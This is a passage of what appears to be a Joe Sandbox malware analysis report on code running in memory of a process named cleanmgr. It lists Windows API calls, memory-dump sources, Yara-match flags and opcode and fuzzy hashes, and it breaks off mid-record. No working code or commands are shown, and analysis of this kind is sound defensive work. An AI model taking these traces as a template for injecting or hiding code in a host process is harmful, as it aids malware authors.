96->95 99 2e9a25c-2e9a27b 97->99 100 2e9a28e-2e9a298 97->100 102 2e9a27d-2e9a286 99->102 103 2e9a28c 99->103 101 2e9a2a9-2e9a2b2 100->101 101->69 104 2e9a2b4-2e9a2be 101->104 102->103 103->97 104->101
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "$$_$)$*b$0$1&$5$7N$8$<($?g$@$Gw$HW$Og$h$m}$n}$zW$~
                                                                                                        • API String ID: 0-45905782
                                                                                                        • Opcode ID: 7a83f0abf16c3fb8472ba6915c3bd1dbe3d0b02c2f72ceb6b7251ee07beaa41f
                                                                                                        • Instruction ID: 322dc76a5a8e7f0078bae71a53cc46e7057570dbe09fd676b5c92a9c13bf439a
                                                                                                        • Opcode Fuzzy Hash: 7a83f0abf16c3fb8472ba6915c3bd1dbe3d0b02c2f72ceb6b7251ee07beaa41f
                                                                                                        • Instruction Fuzzy Hash: BC129AB4E05228CBEF24CF45C9987EDBBB2BF85308F1490DAD1496B291C7B91A84CF55
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 02EAC4D4
                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 02EAC50F
                                                                                                        • FindClose.KERNELBASE(?), ref: 02EAC51A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 3541575487-0
                                                                                                        • Opcode ID: 7659c45de000696fe828aa634ae7344a2c217a687ea480068f81450216b5a1c0
                                                                                                        • Instruction ID: 5c5f79f936fc88292fcf179c5c2969a1ab56c53c899d75aa4e3a941a1217767d
                                                                                                        • Opcode Fuzzy Hash: 7659c45de000696fe828aa634ae7344a2c217a687ea480068f81450216b5a1c0
                                                                                                        • Instruction Fuzzy Hash: E73163B19402097BDB21EFA4CC85FFF777DAF44748F149559B909AB180DA70AA848FA0
                                                                                                        APIs
                                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02EB8FBE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 70c4671a62b886da1cdc779f05956ae86a10824cb2d621fce38c96c8815c2140
                                                                                                        • Instruction ID: 7fa9fa777ca9d3fe1287eeb7affef1f5c015f7dbc3e5e7f35cea9d19efd52083
                                                                                                        • Opcode Fuzzy Hash: 70c4671a62b886da1cdc779f05956ae86a10824cb2d621fce38c96c8815c2140
                                                                                                        • Instruction Fuzzy Hash: D831C0B5A11248AFDB14DF98D880EEFB7B9AF8C704F508219F919A7340D770A901CBA5
                                                                                                        APIs
                                                                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02EB9119
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2738559852-0
                                                                                                        • Opcode ID: 4c83d72734a3ae0051ad837b412ae20bb0309cbe1aa36a2fb353f10b1a83f54d
                                                                                                        • Instruction ID: 92b6d1bd095cb73d2c174bceaed18c1a83e79a59108a0a269ac14bbf0a3b2507
                                                                                                        • Opcode Fuzzy Hash: 4c83d72734a3ae0051ad837b412ae20bb0309cbe1aa36a2fb353f10b1a83f54d
                                                                                                        • Instruction Fuzzy Hash: 4B31D6B5A00209AFDB14DF98D881EEFB7B9EF89714F10811AFD19A7344D770A9118FA1
                                                                                                        APIs
                                                                                                        • NtAllocateVirtualMemory.NTDLL(02EA1B1E,?,02EB7DEF,00000000,00000004,00003000,?,?,?,?,?,02EB7DEF,02EA1B1E,02EBB261,02EB7DEF,7EE80000), ref: 02EB9408
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167126740-0
                                                                                                        • Opcode ID: 3805def68bab0ad485282633f79f7e1b28474ceedc6ccf7f7bb99439c48f3cab
                                                                                                        • Instruction ID: 389c0d0827739e64abde8ffc52331f3857f42fb344f4c8367696a5da67986982
                                                                                                        • Opcode Fuzzy Hash: 3805def68bab0ad485282633f79f7e1b28474ceedc6ccf7f7bb99439c48f3cab
                                                                                                        • Instruction Fuzzy Hash: 2021F3B5A40209AFDB10DF98C881FEFB7B9EF89704F00811AF909A7244D774A9118BA5
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 4033686569-0
                                                                                                        • Opcode ID: 0f301f87b4fe6463b3e576923093ace32776a1d6cea3a361c5c4886c3b8b2835
                                                                                                        • Instruction ID: a0f0a49150e0e0a038c0e7c2a1b68d9f93fe352a3258198ae8d2f7293776411a
                                                                                                        • Opcode Fuzzy Hash: 0f301f87b4fe6463b3e576923093ace32776a1d6cea3a361c5c4886c3b8b2835
                                                                                                        • Instruction Fuzzy Hash: C71170716506087EDB10EB94CC41FEFB3ADDF86714F408559F9099B280DB717A05CBA6
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02EB9207
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: 0281abc325b70bf167454d393558beda0c7014649f4c41559f3eeee4f3c43d81
                                                                                                        • Instruction ID: 115dd4b5317d25869a9759ebb37604193a1827861afc1c12c7220e0915f27e72
                                                                                                        • Opcode Fuzzy Hash: 0281abc325b70bf167454d393558beda0c7014649f4c41559f3eeee4f3c43d81
                                                                                                        • Instruction Fuzzy Hash: A6E086312402147BD620EA59DC00FDB775DDFC5724F458415FA0CA7240C670790187F1
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 8211a75afaab1f369a55d5f86e7f8f9756b761a69fe8b8a0b4f7fae54a77d142
                                                                                                        • Instruction ID: a022060e9b633c1ac31e86cef42cac56ea7469d129500ef906a36ebf03d6703d
                                                                                                        • Opcode Fuzzy Hash: 8211a75afaab1f369a55d5f86e7f8f9756b761a69fe8b8a0b4f7fae54a77d142
                                                                                                        • Instruction Fuzzy Hash: FF90023164550412F10071598914746100D8BD1245F65C411A08265A8D8795DA5269E3
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 9eaf2c50ef9cec6aacb4be39cbdced574330b20856ddbbbfa08522d28cf0fd2d
                                                                                                        • Instruction ID: 1aeb59a452547e0785f9f9af5599685640a67178afe6ea65d12282fc339fefa8
                                                                                                        • Opcode Fuzzy Hash: 9eaf2c50ef9cec6aacb4be39cbdced574330b20856ddbbbfa08522d28cf0fd2d
                                                                                                        • Instruction Fuzzy Hash: 2490026164150052614071598C04446600D9BE2345395C115A09565A0C8618D95696AA
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 4cea06e37a5781a78f4631c7f6f988760aca05283ab0a75e47b92f8c8ec44970
                                                                                                        • Instruction ID: 86bf81865196ad54b1f2bbac33a6de6227d06280876f7a267062d29828259a59
                                                                                                        • Opcode Fuzzy Hash: 4cea06e37a5781a78f4631c7f6f988760aca05283ab0a75e47b92f8c8ec44970
                                                                                                        • Instruction Fuzzy Hash: 0A90023164580022B14071598C84586400D9BE1345B55C011E0826594C8A14DA5757A2
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 376d0e058fb73055a0ef30da7aad897ef52f7320f46ded02804328ccc866a126
                                                                                                        • Instruction ID: b1619d7ac9a06d71847ffb55d16fd93892167bb90ddc01d227d6daae4fb5ab84
                                                                                                        • Opcode Fuzzy Hash: 376d0e058fb73055a0ef30da7aad897ef52f7320f46ded02804328ccc866a126
                                                                                                        • Instruction Fuzzy Hash: AB90023124140412F10075999808686000D8BE1345F55D011A5426595EC665D9926572
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: d446fdb3ff7123f1f686638573a10023546f8925a0e9499e6049edfa9bc9d5f1
                                                                                                        • Instruction ID: 43fd1ce9a8da1470eb5e7392cec632b4dc708b3a82848b37be5610e38e3a0d31
                                                                                                        • Opcode Fuzzy Hash: d446fdb3ff7123f1f686638573a10023546f8925a0e9499e6049edfa9bc9d5f1
                                                                                                        • Instruction Fuzzy Hash: C490023124148812F1107159C80478A000D8BD1345F59C411A4826698D8695D9927562
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 9c92b04b1f237101e575714b42943729299db151cc4448bc275aa909a41ff71c
                                                                                                        • Instruction ID: 4882b269f4266af752be8d5e4feb306854ae941271d51b7cbb05fed326d10e89
                                                                                                        • Opcode Fuzzy Hash: 9c92b04b1f237101e575714b42943729299db151cc4448bc275aa909a41ff71c
                                                                                                        • Instruction Fuzzy Hash: 1390023124140852F10071598804B86000D8BE1345F55C016A0526694D8615D9527962
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 147a5820bd5b8196fb51a0676c57b0344711b5cf54442b3d92f0bc31750c6bb8
                                                                                                        • Instruction ID: bb84ea98fad376f7f79aed179875eed4296f80fb0ccc2f69694d61107a1d2283
                                                                                                        • Opcode Fuzzy Hash: 147a5820bd5b8196fb51a0676c57b0344711b5cf54442b3d92f0bc31750c6bb8
                                                                                                        • Instruction Fuzzy Hash: 8F90023124140423F11171598904747000D8BD1285F95C412A0826598D9656DA53A562
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: bd7a81b171fe23ccfffdf8fab6c8c184ed93ec3b130496d9d25ec0436977e370
                                                                                                        • Instruction ID: 2f7ad67bd2bcdb6325a84e9aba67c80cc6db9c9aad9d1598be503cbc01cc0235
                                                                                                        • Opcode Fuzzy Hash: bd7a81b171fe23ccfffdf8fab6c8c184ed93ec3b130496d9d25ec0436977e370
                                                                                                        • Instruction Fuzzy Hash: 38900221282441627545B1598804547400E9BE1285795C012A1816990C8526E957DA62
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 046597515d8ab352152bcd2642f10a5eae4cb4b4606e011fbf40897342e29e98
                                                                                                        • Instruction ID: 5996ff4b5f467f4d8982f286634e6b8d393f7985b778ebb1645791ca61f369a2
                                                                                                        • Opcode Fuzzy Hash: 046597515d8ab352152bcd2642f10a5eae4cb4b4606e011fbf40897342e29e98
                                                                                                        • Instruction Fuzzy Hash: A290022134140013F14071599818646400DDBE2345F55D011E0816594CD915D9575663
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 3fdd3a394a95481980e4a7299266c54f2db46dfbbd6e9bece0d1932fc204d5e8
                                                                                                        • Instruction ID: 7db39c3e0a70228319c95c0b9b6bc29168d7dda0abca99b7cd169bc37510d230
                                                                                                        • Opcode Fuzzy Hash: 3fdd3a394a95481980e4a7299266c54f2db46dfbbd6e9bece0d1932fc204d5e8
                                                                                                        • Instruction Fuzzy Hash: DC90022925340012F1807159980864A000D8BD2246F95D415A0417598CC915D96A5762
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 0d06bdad7f27aa9f83b5afab70165a49553c41bf1d0b3f1176e713b741d8d7e6
                                                                                                        • Instruction ID: 3e45cd7d8f27b17a53e531c3deb4bb0b95ab79b0da97ed62941021fb2a737fd3
                                                                                                        • Opcode Fuzzy Hash: 0d06bdad7f27aa9f83b5afab70165a49553c41bf1d0b3f1176e713b741d8d7e6
                                                                                                        • Instruction Fuzzy Hash: 7990026124180413F14075598C04647000D8BD1346F55C011A2466595E8A29DD526576
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 617adce7445bffd65313dfc8d7ed2e94fd6b7e9912f4ce229ee0f2c0477739b7
                                                                                                        • Instruction ID: 3122c9316582bcd9c21f660589e5101a7877a406a6e8770bf4bc3fe8f73bb6ab
                                                                                                        • Opcode Fuzzy Hash: 617adce7445bffd65313dfc8d7ed2e94fd6b7e9912f4ce229ee0f2c0477739b7
                                                                                                        • Instruction Fuzzy Hash: DC90022164140512F10171598804656000E8BD1285F95C022A1426595ECA25DA93A572
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 7a320be4462af664a82709bf7809bd6534cf8c74a645183ea273984bcd45c017
                                                                                                        • Instruction ID: 1ca7d242b29616783894c012934442ae9da151f8f389455d0523f9bd2055a2aa
                                                                                                        • Opcode Fuzzy Hash: 7a320be4462af664a82709bf7809bd6534cf8c74a645183ea273984bcd45c017
                                                                                                        • Instruction Fuzzy Hash: 43900221251C0052F20075698C14B47000D8BD1347F55C115A0556594CC915D9625962
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: b37ef2727dc061ed5a0cda4364f624896b6a614dbb5dfc1042fb1f923d56df42
                                                                                                        • Instruction ID: 788f0314c3dd0215444af65741db967ff37cc863badf9f74fffd27ad3368c199
                                                                                                        • Opcode Fuzzy Hash: b37ef2727dc061ed5a0cda4364f624896b6a614dbb5dfc1042fb1f923d56df42
                                                                                                        • Instruction Fuzzy Hash: 5D9002216414005261407169CC44946400DAFE2255755C121A0D9A590D8559D9665AA6
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: c6d1295e7372875bf2270ca1868f06546570a197491ca24be058ed49ba0a0475
                                                                                                        • Instruction ID: c089a31eb50f8fc97fb59e2c6fa1d923be2b7a168c83d196ec44d67f8f8b1331
                                                                                                        • Opcode Fuzzy Hash: c6d1295e7372875bf2270ca1868f06546570a197491ca24be058ed49ba0a0475
                                                                                                        • Instruction Fuzzy Hash: A190026138140452F10071598814B46000DCBE2345F55C015E1466594D8619DD536567
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 92eb207da4d071c03113f5e5c9238e9625d5d8ab7594149defd736c2145b2c6c
                                                                                                        • Instruction ID: a7be0e2bb1b6af63089648489643800dd2876cf8bd513055aa17db3dc269e0d2
                                                                                                        • Opcode Fuzzy Hash: 92eb207da4d071c03113f5e5c9238e9625d5d8ab7594149defd736c2145b2c6c
                                                                                                        • Instruction Fuzzy Hash: 2690022128545112F150715D8804656400DABE1245F55C021A0C165D4D8555D9566662
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: d0557ac255867ae86f9b145c7fbd3b23d3d33b87b009e2d5e26a5f5476ca9b58
                                                                                                        • Instruction ID: f0ff72aee04450ba335c6a686db5144d2e71b078aeb9249c60af033fde8670a5
